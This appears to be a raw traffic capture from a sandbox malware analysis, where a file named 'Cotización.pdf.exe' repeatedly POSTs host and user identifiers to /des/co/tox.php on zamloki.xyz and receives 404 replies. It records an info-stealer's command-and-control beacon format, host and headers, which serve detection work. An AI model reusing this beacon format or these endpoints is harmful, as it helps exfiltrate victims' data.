                                    Jul 21, 2021 17:02:06.098681927 CEST | 1359 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pB8W4LFbf7fBjYSBwa2GsSqK39rwtaMwSteCL%2FVR9rt81a4nFB0BzJGwOt20T1GoTE3iN1%2FXDj3633PqNsS2AszUAwIzKzHun3joUqlXB7Y13st8Jy60CjltOgBQoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eee8b564a56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    3 | 192.168.2.3 | 49730 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:49.519073009 CEST | 1280 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:49.539033890 CEST | 1281 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:49.794929028 CEST | 1281 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dBHolTJMy%2F4M1XaDJCysyWWrKLFVeZ%2Fj%2FUH%2Bf8IbSIbY2IfhL8LswcQD2TM0MN%2BlLS8Hq0Lbr0Tk9L2B2V%2BLMfNATVgzhZx3B4r8q3zb1TuoI2N6LEhnvmY9gK3CVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e8898844a7f-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    30 | 192.168.2.3 | 49762 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:06.367161036 CEST | 1414 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:06.387041092 CEST | 1414 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:06.655983925 CEST | 1415 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9g1vjNqEee5FCU9BItfe5cYHkWAGIXdHar890P%2BDdlCjLLoNvkTU1kbADEkoETQnrDzXkvKXa3u1J1XsfS61OZ9rhf80BOJ3oVHAE78ENidDu%2B0JAjUpaPgGAlsQlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ef1dcc93128-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    31 | 192.168.2.3 | 49763 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:06.914597034 CEST | 1416 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:06.932962894 CEST | 1416 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:07.206824064 CEST | 1417 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=29TVUbuseyMGsyk9jp5E8kZPVhZvXtdoHPtPvHyeGG%2BCZMGPsAqQ%2FaoI8%2Fcvv1PIYtMr%2BwZmemLmC9hkF0bH3mQw0AWZRzMFDeBoyLDYGQboJnjx9OjFtLP8fpEyDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ef5492a2bca-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    32 | 192.168.2.3 | 49764 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:07.480763912 CEST | 1418 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:07.500653982 CEST | 1418 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:07.754492998 CEST | 1419 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8bDeYGjy4rA%2BmDL6ibOR6nIu%2FVqhvZH5b67xyOZRUfEh1lIT774tH4wCpkjvzcihDV5DoL%2FjB9Qm0gR2f4e2ZqVDGYpBJFovQDV%2FyEFBe20U4%2FREYAGgmKD3C8MSPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ef8dd320625-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    33 | 192.168.2.3 | 49765 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:08.015722990 CEST | 1419 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:08.033787012 CEST | 1420 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:08.327749014 CEST | 1420 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ulhNvgxWWxZ%2BNWYoVWh%2FBiPLSYTGBP9LsVK2JJKOUShJjzheOm87irlEei2Fr0O4cwQ2%2BWa%2FrIlDawoRAgsYcBjKIROZVQ%2B6BiVyGaFFZ3t4SnTe8N93JE7nbSYo7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254efc3d4e5364-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    34 | 192.168.2.3 | 49766 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:08.645421982 CEST | 1421 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:08.667253017 CEST | 1422 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:08.915510893 CEST | 1422 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6bjHUGsx3EuMuqaqR%2Bu3awH5%2BJcDauqoyR0Fcm73Q57doOx2pPdWyHCoh0RqRMPPfgIcv9p9TcsgR7ca46Y78wT0SZFQQXnD9r8heeLSxdd3k14W6NNUGPXiGD79oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f001b64dfa9-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    35 | 192.168.2.3 | 49767 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:09.177828074 CEST | 1423 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:09.195965052 CEST | 1423 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:09.436971903 CEST | 1424 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0JcspaDQ4RRkDmAtBOErdYx4ggqfAzt5d7F0s5G0w1Ti%2FSlbF7EGxXhAQQEw5qjGIYC%2FFKSSzV7gFMo08b0dzp13lSiZCK%2Fdgs9EsCQvcyRYqMUC%2FfzcTTOmOztJYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f03691405b3-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    36 | 192.168.2.3 | 49768 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:09.683984995 CEST | 1425 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:09.704201937 CEST | 1425 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:10.016499043 CEST | 1426 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8wI2KTri1DCvBu8jinf%2FetqYiLXuNfBnp63%2FfY8UfmhEgUnvEfs2UroIA73xNtPVBtlNKGtADefCQHaRWWpXxE8jqt%2FYHXEm35ch%2Bhs80GFOS3gcNOqucRUWpBYENQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f069e764ea3-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    37 | 192.168.2.3 | 49769 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:10.247766972 CEST | 1427 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:10.265628099 CEST | 1427 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:10.555449963 CEST | 1428 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=02pNKRRY8XvUsutESEsY8YPMYKxgm4M8HJKWGkQW0i08lp%2FMTmWE21rwIOh3rDC4vtoLeaIojYJRWMCBCbIYJeZH8cc7vIdrw7ToERfGrTik38i4hZSp0O9NJzmGjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f0a1d562b59-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    38 | 192.168.2.3 | 49770 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:10.821021080 CEST | 1429 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:10.841195107 CEST | 1429 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:11.103722095 CEST | 1430 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZavGK1zZSfUirEO9gmX9rV1swXiNT%2BWzfo%2FgR7UKa5Hfd5AXT4QLZ3%2BU9KZCLkloKL64RMWUN4K7lrTttpikDIYp%2FeuF2Kx5QYoXGjgRzYy4gz58nqg%2FxnrqSshgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f0dbe5e2b7d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    39 | 192.168.2.3 | 49776 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:11.345000982 CEST | 1444 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:11.363692045 CEST | 1447 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:11.644579887 CEST | 1694 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K42DoQcI5Fws%2Bdo5Rq1VsW66TpuuLXqeyOLKbWzXPgLGHnTlwLu2DzspJ8fFktMI0Rzjv0QL0udAQzPyYEkwqGisSynYmh%2FGGyBMR%2BxZe6FjEeVrf7iIl%2F9cSxUo2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f10f8054e14-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Jul 21, 2021 17:02:11.645127058 CEST | 1697 | IN | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    4 | 192.168.2.3 | 49731 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:50.104839087 CEST | 1282 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:50.122829914 CEST | 1282 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:50.388648987 CEST | 1283 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YIGo1AmwvazIX6MbCgBTEJMQ4LZATw9qcfSYGsSPPwkVcJ5M72AptSPScE6oD6J%2F2%2FyUO6A7MxzM3rGLw3CpYz%2B%2B8V9G0qnS15FqaPqyQV9XvTYiL3egiSs%2FyZCIKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e8c3c062b59-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    40 | 192.168.2.3 | 49777 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:11.925400972 CEST | 5036 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:11.945297956 CEST | 5036 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:12.192439079 CEST | 5037 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
